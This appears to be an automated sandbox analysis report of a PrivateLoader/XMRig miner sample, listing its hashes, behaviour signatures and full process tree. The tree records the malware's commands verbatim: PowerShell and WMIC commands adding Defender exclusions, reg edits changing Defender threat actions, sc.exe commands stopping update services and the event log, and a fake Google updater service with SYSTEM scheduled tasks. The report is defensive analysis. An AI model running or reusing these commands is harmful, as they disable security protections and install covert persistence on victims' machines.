Analysis

  • max time kernel
    49s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    21-05-2024 05:38

General

  • Target

    0702315c2af23584f8ef1febc660651c052eb448819d4c7432e51148ea8db5a5_NeikiAnalytics.exe

  • Size

    405KB

  • MD5

    1a58288224c79dc2044ca29e638ef5c1

  • SHA1

    5fd106948f289eff5c93d024af2099ea1be433eb

  • SHA256

    0702315c2af23584f8ef1febc660651c052eb448819d4c7432e51148ea8db5a5

  • SHA512

    f634c69fb0173ba905e234f84963d39c45dc433be2190224da8cb850eeb86b1de7fc128ece5f1f1bec24436a4b0f74bd8021024636767af869b10bd20cb2183c

  • SSDEEP

    12288:6fr32XSfBAlkQZZMx6eIuKRPDEO22Ww0XpQ:6fr32ilYZy6H9Ee2XpQ

Malware Config

Signatures

  • Modifies firewall policy service 2 TTPs 1 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • UAC bypass 3 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 5 IoCs
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 21 IoCs
  • UPX packed file 12 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0702315c2af23584f8ef1febc660651c052eb448819d4c7432e51148ea8db5a5_NeikiAnalytics.exe
    "C:\Users\Admin\AppData\Local\Temp\0702315c2af23584f8ef1febc660651c052eb448819d4c7432e51148ea8db5a5_NeikiAnalytics.exe"
    1⤵
    • UAC bypass
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2460
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0702315c2af23584f8ef1febc660651c052eb448819d4c7432e51148ea8db5a5_NeikiAnalytics.exe" -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2516
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
      2⤵
      • Drops startup file
      • Loads dropped DLL
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2588
      • C:\Users\Admin\Pictures\udTMembDuaWb2a2PCQu3x8Os.exe
        "C:\Users\Admin\Pictures\udTMembDuaWb2a2PCQu3x8Os.exe" /s
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Writes to the Master Boot Record (MBR)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2432
        • C:\Users\Admin\Pictures\360TS_Setup.exe
          "C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Program Files directory
          • Suspicious use of WriteProcessMemory
          PID:584
          • C:\Program Files (x86)\1716277015_0\360TS_Setup.exe
            "C:\Program Files (x86)\1716277015_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Loads dropped DLL
            • Writes to the Master Boot Record (MBR)
            PID:2240
      • C:\Users\Admin\Pictures\R5ZPccKdcjUKYvQiertJnKue.exe
        "C:\Users\Admin\Pictures\R5ZPccKdcjUKYvQiertJnKue.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1300
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2028
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1404
          • C:\Windows\system32\wusa.exe
            wusa /uninstall /kb:890830 /quiet /norestart
            5⤵
            • Drops file in Windows directory
            PID:1736
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop UsoSvc
          4⤵
          • Launches sc.exe
          PID:1548
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop WaaSMedicSvc
          4⤵
          • Launches sc.exe
          PID:912
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop wuauserv
          4⤵
          • Launches sc.exe
          PID:872
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop bits
          4⤵
          • Launches sc.exe
          PID:2224
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop dosvc
          4⤵
          • Launches sc.exe
          PID:2120
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2040
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1708
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1088
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:312
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
          4⤵
          • Launches sc.exe
          PID:1892
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
          4⤵
          • Launches sc.exe
          PID:2744
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop eventlog
          4⤵
          • Launches sc.exe
          PID:1520
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
          4⤵
          • Launches sc.exe
          PID:1556
      • C:\Users\Admin\Pictures\X6slyPxgNLVTTz9aWEQzIi4E.exe
        "C:\Users\Admin\Pictures\X6slyPxgNLVTTz9aWEQzIi4E.exe"
        3⤵
        • Modifies firewall policy service
        • Executes dropped EXE
        • Drops file in System32 directory
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        PID:2392
      • C:\Users\Admin\Pictures\vVrW9OEWzSYHPTGWRBN9E5p1.exe
        "C:\Users\Admin\Pictures\vVrW9OEWzSYHPTGWRBN9E5p1.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2500
        • C:\Users\Admin\AppData\Local\Temp\7zS479B.tmp\Install.exe
          .\Install.exe /IjiHdidVaJ "385118" /S
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:1572
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
            5⤵
              PID:1508
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                6⤵
                  PID:2844
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                    7⤵
                      PID:1908
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                        8⤵
                          PID:2068
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                      6⤵
                        PID:2644
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                          7⤵
                            PID:2272
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                              8⤵
                                PID:908
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                            6⤵
                              PID:2648
                              • C:\Windows\SysWOW64\cmd.exe
                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                7⤵
                                  PID:2352
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                    8⤵
                                      PID:1292
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                  6⤵
                                    PID:2412
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                      7⤵
                                        PID:476
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                          8⤵
                                            PID:2180
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                        6⤵
                                          PID:1948
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                            7⤵
                                              PID:1932
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                8⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                PID:2472
                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                  9⤵
                                                    PID:2748
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                            5⤵
                                              PID:568
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                6⤵
                                                  PID:2308
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                    7⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    PID:2828
                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                      8⤵
                                                        PID:2360
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 07:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\FNViefQ.exe\" it /HyDdidzNlF 385118 /S" /V1 /F
                                                  5⤵
                                                  • Creates scheduled task(s)
                                                  PID:1220
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                  5⤵
                                                    PID:1472
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                      6⤵
                                                        PID:1032
                                                        • \??\c:\windows\SysWOW64\schtasks.exe
                                                          schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                          7⤵
                                                            PID:3024
                                                  • C:\Users\Admin\Pictures\LZa0XsA9tTuJjw1VC3gbf23z.exe
                                                    "C:\Users\Admin\Pictures\LZa0XsA9tTuJjw1VC3gbf23z.exe"
                                                    3⤵
                                                      PID:2760
                                                      • C:\Users\Admin\AppData\Local\Temp\7zS61DF.tmp\Install.exe
                                                        .\Install.exe /IjiHdidVaJ "385118" /S
                                                        4⤵
                                                          PID:2052
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                            5⤵
                                                              PID:1396
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                6⤵
                                                                  PID:1540
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                    7⤵
                                                                      PID:1752
                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                        8⤵
                                                                          PID:2620
                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                      6⤵
                                                                        PID:1988
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                          7⤵
                                                                            PID:576
                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                              8⤵
                                                                                PID:2224
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                            6⤵
                                                                              PID:1684
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                7⤵
                                                                                  PID:1692
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                    8⤵
                                                                                      PID:2036
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                  6⤵
                                                                                    PID:1884
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                      7⤵
                                                                                        PID:1740
                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                          8⤵
                                                                                            PID:2652
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                        6⤵
                                                                                          PID:2624
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                            7⤵
                                                                                              PID:2676
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                8⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                PID:2724
                                                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                  9⤵
                                                                                                    PID:1752
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                            5⤵
                                                                                              PID:2172
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                6⤵
                                                                                                  PID:2408
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                    7⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    PID:2720
                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                      8⤵
                                                                                                        PID:2920
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 07:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\MhOYRXL.exe\" it /JHHdidHlvL 385118 /S" /V1 /F
                                                                                                  5⤵
                                                                                                  • Creates scheduled task(s)
                                                                                                  PID:2768
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                                  5⤵
                                                                                                    PID:1232
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                      6⤵
                                                                                                        PID:2992
                                                                                                        • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                          7⤵
                                                                                                            PID:2868
                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                  C:\Windows\system32\WerFault.exe -u -p 2460 -s 820
                                                                                                  2⤵
                                                                                                    PID:2604
                                                                                                • C:\ProgramData\Google\Chrome\updater.exe
                                                                                                  C:\ProgramData\Google\Chrome\updater.exe
                                                                                                  1⤵
                                                                                                  • Drops file in Drivers directory
                                                                                                  • Executes dropped EXE
                                                                                                  • Drops file in System32 directory
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:2016
                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                    2⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Drops file in System32 directory
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2312
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                    2⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:2400
                                                                                                    • C:\Windows\system32\wusa.exe
                                                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                      3⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      PID:2532
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                    2⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:2640
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                    2⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:1972
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    C:\Windows\system32\sc.exe stop wuauserv
                                                                                                    2⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:1164
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    C:\Windows\system32\sc.exe stop bits
                                                                                                    2⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:1660
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    C:\Windows\system32\sc.exe stop dosvc
                                                                                                    2⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:2356
                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                    2⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:852
                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                    2⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2352
                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                    2⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1960
                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                    2⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1868
                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                    C:\Windows\system32\conhost.exe
                                                                                                    2⤵
                                                                                                      PID:2332
                                                                                                    • C:\Windows\explorer.exe
                                                                                                      explorer.exe
                                                                                                      2⤵
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2184
                                                                                                  • C:\Windows\system32\taskeng.exe
                                                                                                    taskeng.exe {B2DD9A68-1E14-440A-BB23-060AF978D8A0} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                    1⤵
                                                                                                      PID:2968
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\MhOYRXL.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\MhOYRXL.exe it /JHHdidHlvL 385118 /S
                                                                                                        2⤵
                                                                                                          PID:2748
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
